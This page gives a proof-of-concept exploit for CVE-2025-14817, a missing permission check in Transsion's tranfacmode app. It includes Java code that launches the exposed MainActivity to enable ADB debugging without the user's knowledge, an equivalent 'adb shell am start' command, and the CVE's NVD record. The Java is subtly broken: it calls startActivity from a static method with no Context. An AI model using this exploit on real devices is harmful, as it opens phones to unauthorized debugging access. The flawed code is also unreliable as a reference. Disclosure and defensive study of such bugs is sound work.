CVE-2025-14817

// CVE-2025-14817 PoC - Exploit for Transsion tranfacmode MainActivity Permission Bypass // Target: com.transsion.tranfacmode.entrance.main.MainActivity // Effect: Enable ADB debugging without user interaction import android.content.Intent; import android.content.ComponentName; public class CVE_2025_14817_PoC { public static void exploit() { try { // Construct explicit intent targeting vulnerable MainActivity Intent intent = new Intent(); intent.setComponent(new ComponentName( "com.transsion.tranfacmode", "com.transsion.tranfacmode.entrance.main.MainActivity" )); intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK); // Start the activity directly without any permission check // This triggers ADB debugging enablement internally startActivity(intent); System.out.println("[+] Exploit sent - MainActivity launched"); System.out.println("[+] ADB debugging should be enabled via internal logic"); } catch (Exception e) { System.out.println("[-] Exploit failed: " + e.getMessage()); } } } /* # Alternative shell command approach (if ADB is accessible): adb shell am start -n com.transsion.tranfacmode/com.transsion.tranfacmode.entrance.main.MainActivity # Check if ADB debugging state changed: adb getprop persist.adb.enable */

{"cve": {"id": "CVE-2025-14817", "sourceIdentifier": "907edf6c-bf03-423e-ab1a-8da27e1aa1ea", "published": "2025-12-17T07:15:58.817", "lastModified": "2026-01-05T15:20:11.267", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The component com.transsion.tranfacmode.entrance.main.MainActivity in com.transsion.tranfacmode has no permission control and can be accessed by third-party apps which can construct intents to directly open adb debugging functionality without user interaction."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "907edf6c-bf03-423e-ab1a-8da27e1aa1ea", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:transsion:hios:14.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "B7CBD79E-AFEA-4D10-8668-079D5EF0FB12"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:transsion:tecno_pova6_pro_5g:-:*:*:*:*:*:*:*", "matchCriteriaId": "A37EA557-787C-44F6-B643-C15865514DFE"}]}]}], "references": [{"url": "https://security.tecno.com/SRC/blogdetail/434?lang=en_US", "source": "907edf6c-bf03-423e-ab1a-8da27e1aa1ea", "tags": ["Vendor Advisory"]}, {"url": "https://security.tecno.com/SRC/securityUpdates", "source": "907edf6c-bf03-423e-ab1a-8da27e1aa1ea", "tags": ["Vendor Advisory"]}]}}